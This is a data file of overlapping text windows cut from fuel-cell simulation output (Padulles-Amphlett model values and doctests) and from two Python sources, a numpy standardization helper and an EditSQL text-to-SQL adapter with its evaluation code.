0.19686163393728537", ": 0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage : 4.147096936703843 V Loss", "V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm", "atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I : 2.3", "Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage : 4.0097174496577335 V", "FC Power : 3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963", "V Eta Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta Ohmic", "W FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097", "V FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage :", ": 3.9730043399134525 V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O :", "########### I : 3.4 E : 6.06836472559345 V Eta Activation : 0.4190844003836543 V", "0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575", "0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power", "3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss : 0.324807877394268 V PH2 :", "0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576", "2.6555639230341663 W ########### I : 1.5 E : 6.068393967445208 V Eta Activation :", ": 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 :", "0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W FC Voltage", "V Eta Activation : 0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V Eta Ohmic", "Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage : 4.06476164297181 V", ": 
0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal :", ": 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I : 1.1 E :", "Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258", "Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage : 4.185910978067744 V", "PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal", "V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302 atm", "atm Power-Thermal : 0.41280968341523216 W ########### I : 0.4 E : 6.068410886366294 V", "########### I : 0.8 E : 6.068404734927729 V Eta Activation : 0.3232442167420945 V", ": 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I : 1.6 E :", "Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W", "W ########### I : 2.5 E : 6.068378579881878 V Eta Activation : 0.39870996749954657", "atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report is generating", "1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC Power", "Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538", "Ohmic : 0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W", "Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage : 3.9848661958784737 V", "PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I : 0.2 E", "5.495727044129421 W ########### I : 2.7 E : 6.068375501600038 V Eta Activation :", "0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage", "########### I : 1.1 E : 6.068400120676597 V Eta Activation : 0.3443319458183834 V", "atm PH2O : 0.2420432983355364 atm PO2 
: 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W", "Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114", ": 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ########### I : 2.7 E :", ": 0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage : 4.206975801412199 V Loss", "0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC Power", "0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I : 1.2 E : 6.068398582464819", "6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta", ": 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report is generating ... Done!", "0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage", "I : 1.0 E : 6.068401658824337 V Eta Activation : 0.33802037026202836 V Eta", "6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta", "W ########### I : 3.9 E : 6.068357026521189 V Eta Activation : 0.42817767789163225", "0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I : 2.3 E : 6.068381657907269", "0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage : 3.918455976181777 V Loss :", "Power : 9.010249888496427 W FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V", "V Eta Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta Ohmic", "0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ########### I : 0.3 E : 6.068412424065923", "V Eta Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V FC Efficiency", "V Eta Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC Power :", ": 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V", "3.5712130804699886 W ########### I : 1.9 E : 
6.068387813188879 V Eta Activation :", ": 4.022761331205627 V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O :", "FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm", "0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047", "PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal", "atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W", ": 9.010249888496427 W FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V PH2", "0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V FC", "Eta Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111", "4.06476164297181 V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136", "V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm", ": 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V", "V Eta Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power :", "0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power", ": 3.1088387177404826 W ########### I : 1.7 E : 6.068390890445182 V Eta Activation", "3.9614863490169867 V Loss : 0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765", "0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power", "0.50107358791043 FC Power : 14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss :", ". . 
I : 0.1 E : 6.0684154992732005 V Eta Activation : 0.18557231242539243", "V Eta Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power :", "V FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage :", ": 0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage : 4.541569905469162 V Loss", "I : 0.7 E : 6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta", "V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm", "W FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839", "Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665", "6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta", "2.5 E : 6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta Concentration :", "0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I :", "Report is generating ... 
Warning : The value of I(>0.1) leads to minus", "4.079852105493149 V Loss : 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458", "W ########### I : 3.7 E : 6.068360106342617 V Eta Activation : 0.4246884348310017", ": 6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V", ": 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal :", "Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397", "Eta Ohmic : 0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928", ": 0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage : 4.022761331205627 V Loss", "3.918455976181777 V Loss : 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935", ": 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I : 3.0 E :", "Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2", "V Eta Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC Efficiency", "5.1395791003235525 V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925", "V FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage :", ": 6.344003082266143 W FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V PH2", ": 6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V", "Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage : 4.229335388177429 V", "0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I :", ": 0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I", "Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575", ": 
0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC", ": 1.1 E : 6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta Concentration", ": 2.8 E : 6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta Concentration", "0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836", ": 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 :", "0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss :", "0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC", "FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm", "V Eta Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta Ohmic", "V Eta Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC Efficiency", "Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461", "1.2 E : 6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta Concentration :", "4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979", "V FC Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage :", "V FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage :", "Activation : 0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592", "Eta Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC Efficiency :", "FC Power : 14.106441514254398 W FC Voltage : 3.918455976181777 V Loss : 0.4299811339950573", "V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm", "FC Voltage : 4.165992733072229 V Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm", ": 4.079852105493149 V Loss 
: 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O :", "Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5]", ": 6.06836472559345 V Eta Activation : 0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V", ": 0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage : 4.095568131134739 V Loss", "Eta Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta Ohmic :", "Eta Ohmic : 0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398", ": 0.9 E : 6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta Concentration", "0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895", "Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2", "Power : 11.591576336201861 W FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V", ": 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal :", "Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O", "Power-Thermal : 4.279867176181073 W ########### I : 2.2 E : 6.068383196823811 V Eta", "I : 1.8 E : 6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta", "0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142", "0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272", "Eta Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta Ohmic :", "0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I : 1.7 E : 6.068390890445182", "V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789 
atm PO2 : 0.1904280476833403 atm", "Eta Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V FC Efficiency :", "Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>>", ". I : 0.1 E : 6.14455344314445 V Eta Activation : 0.9092187394310518 V", "Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277", "0.588897103358606 W ########### I : 0.5 E : 6.068409348602667 V Eta Activation :", "Power-Thermal : 6.49540141236458 W ########### I : 3.1 E : 6.068369344266841 V Eta", "V PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385 atm", ": 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I : 2.5 E :", "0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power", "V FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage :", "FC Power : 3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss : 0.324807877394268", "0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ########### I : 3.5 E : 6.068363185907339", "atm PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ########### I : 1.5", "V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542 atm", "PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal", "V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm", "Power : 5.562302489345107 W FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V", ">>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>>", ": 
6.49540141236458 W ########### I : 3.1 E : 6.068369344266841 V Eta Activation", "6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V Eta", "PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I : 0.7 E", "FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm", "atm Power-Thermal : 5.004572056867657 W ########### I : 2.5 E : 6.068378579881878 V", "atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I : 3.6", "0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ########### I : 1.5 E : 6.068393967445208", "Eta Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta Ohmic :", "FC Power : 8.25823714817561 W FC Voltage : 4.129118574087805 V Loss : 0.387853540075361", "V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm", "Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O", "Voltage : 4.185910978067744 V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O", "atm PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report is generating", "0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I : 3.8 E : 6.068358566463993", "FC Power : 10.494272955870581 W FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483", "Power-Thermal : 3.8055158202626993 W ########### I : 2.0 E : 6.0683862744646095 V Eta", ": 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal :" ]
[ ":param MLLD_functions: this class has several functions that are usually used by myself.", "\"\"\" var_average = np.average(variable) var_std = np.std(variable) new_variable = [] for i in", "for i in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std new_variable.append(new_variable_i) self.new_variable = np.array(new_variable)", ":param variable: the array with the variables you wish to standardize :return: standardized", "standardized array \"\"\" var_average = np.average(variable) var_std = np.std(variable) new_variable = [] for", "= np.average(variable) var_std = np.std(variable) new_variable = [] for i in range(variable.size): new_variable_i", "the variables you wish to standardize :return: standardized array \"\"\" var_average = np.average(variable)", "as np \"\"\" :param MLLD_functions: this class has several functions that are usually", "several functions that are usually used by myself. \"\"\" class MLLD_functions: def standardization(self,", "wish to standardize :return: standardized array \"\"\" var_average = np.average(variable) var_std = np.std(variable)", "are usually used by myself. \"\"\" class MLLD_functions: def standardization(self, variable): \"\"\" :param", "usually used by myself. \"\"\" class MLLD_functions: def standardization(self, variable): \"\"\" :param variable:", "def standardization(self, variable): \"\"\" :param variable: the array with the variables you wish", "variables you wish to standardize :return: standardized array \"\"\" var_average = np.average(variable) var_std", "\"\"\" :param MLLD_functions: this class has several functions that are usually used by", "this class has several functions that are usually used by myself. 
\"\"\" class", "var_average = np.average(variable) var_std = np.std(variable) new_variable = [] for i in range(variable.size):", "class MLLD_functions: def standardization(self, variable): \"\"\" :param variable: the array with the variables", "np.average(variable) var_std = np.std(variable) new_variable = [] for i in range(variable.size): new_variable_i =", "np.std(variable) new_variable = [] for i in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std", "= np.std(variable) new_variable = [] for i in range(variable.size): new_variable_i = (variable[i] -", "myself. \"\"\" class MLLD_functions: def standardization(self, variable): \"\"\" :param variable: the array with", "\"\"\" :param variable: the array with the variables you wish to standardize :return:", "numpy as np \"\"\" :param MLLD_functions: this class has several functions that are", "standardization(self, variable): \"\"\" :param variable: the array with the variables you wish to", "var_std = np.std(variable) new_variable = [] for i in range(variable.size): new_variable_i = (variable[i]", "= [] for i in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std new_variable.append(new_variable_i) self.new_variable", "to standardize :return: standardized array \"\"\" var_average = np.average(variable) var_std = np.std(variable) new_variable", "\"\"\" class MLLD_functions: def standardization(self, variable): \"\"\" :param variable: the array with the", "[] for i in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std new_variable.append(new_variable_i) self.new_variable =", "array \"\"\" var_average = np.average(variable) var_std = np.std(variable) new_variable = [] for i", "import numpy as np \"\"\" :param MLLD_functions: this class has several functions that", ":return: standardized array \"\"\" var_average = np.average(variable) var_std = np.std(variable) new_variable = []", "class has several functions that are usually used by myself. 
\"\"\" class MLLD_functions:", "has several functions that are usually used by myself. \"\"\" class MLLD_functions: def", "variable: the array with the variables you wish to standardize :return: standardized array", "in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std new_variable.append(new_variable_i) self.new_variable = np.array(new_variable) return self.new_variable", "MLLD_functions: this class has several functions that are usually used by myself. \"\"\"", "MLLD_functions: def standardization(self, variable): \"\"\" :param variable: the array with the variables you", "variable): \"\"\" :param variable: the array with the variables you wish to standardize", "by myself. \"\"\" class MLLD_functions: def standardization(self, variable): \"\"\" :param variable: the array", "i in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std new_variable.append(new_variable_i) self.new_variable = np.array(new_variable) return", "the array with the variables you wish to standardize :return: standardized array \"\"\"", "array with the variables you wish to standardize :return: standardized array \"\"\" var_average", "new_variable = [] for i in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std new_variable.append(new_variable_i)", "that are usually used by myself. \"\"\" class MLLD_functions: def standardization(self, variable): \"\"\"", "functions that are usually used by myself. \"\"\" class MLLD_functions: def standardization(self, variable):", "np \"\"\" :param MLLD_functions: this class has several functions that are usually used", "you wish to standardize :return: standardized array \"\"\" var_average = np.average(variable) var_std =", "with the variables you wish to standardize :return: standardized array \"\"\" var_average =", "standardize :return: standardized array \"\"\" var_average = np.average(variable) var_std = np.std(variable) new_variable =", "used by myself. 
\"\"\" class MLLD_functions: def standardization(self, variable): \"\"\" :param variable: the" ]
[ "json import torch from editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction", "= comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch", "the first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS':", "database_schemas_dict={}) # function used for loading of interaction in raw state self.int_load_function =", "for i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int})", "para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings =", "f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config =", "vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov = 0 for token in vocabulary_tokens:", "use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300", "'mcS': do_lower_case = False else: do_lower_case = True no_pretraining = False bert_config_file =", "prediction, db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed # ------------", "evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output of EditsqlAdapter. 
By", "----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output of", "= self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw", "errors use_gold_query: comparison with the gold queries from spider instead of the prediction", "in raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data):", "values for nl_question and db_id output_dir: path of dir where the translations are", "return self.post_process(prediction, db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0]", "InteractionItem that contains the natural language question and the database id \"\"\" #", "\"\"\" Predict the sql for the next utterance in an interaction Args: nl_question:", "and db_id from the input file and save the translations to a file", "original embeddings loading function with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define", "data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from", "# determine the instances to test on if randomness: sample_indices = random.sample(range(len(references)), k=amount)", "results of standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if not", "sample_indices = range(amount) comparisons = [] num_errors = 0 start = time.time() for", "duration / amount num_correct = amount - num_errors accuracy = num_correct * 100", "token in vocabulary_tokens: token_id = vocab.token_to_id(token) if 
token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token]", "self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed # ------------ Evaluation ----------------- def evaluate(self,", "from distorting the results gold_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c", "a file in the output directory Args: input_file: path of file with list", "an InteractionItem obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def translate(self,", "_, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for loading", "translation model Args: params: the parsed arguments data: the ATISDataset Returns: the loaded", "values for nl_question and db_id from the input file and save the translations", "vocabulary_tokens: token_id = vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov", "np import json import torch from editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset", "an InteractionItem that contains the natural language question and the database id Args:", "[])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be", "f: requests = json.load(f) for i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"])", "embeddings loading function with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define a", "path instead of relative path in the first line def get_bert(params): BERT_PT_PATH =", "\" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = 
references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction", "and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" + params.save_file) model.eval()", "as context prev_predictions: the previous predictions Returns: an InteractionItem that contains the natural", "json.load(infile) if not amount: # let amount default to _all_ examples from the", "return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql", "time.time() for i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq =", "prev_predictions.append(\"dummy sql query\") for i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\":", "create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov", "create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings,", "== \"sparc\": params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create the dataset", "fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for i, nl_q in enumerate(nl_questions): sql_int", "db_id output_dir: path of dir where the translations are saved \"\"\" edi_adap =", "or an empty list prev_predictions: the previous predictions or an empty list Returns:", "the reference. 
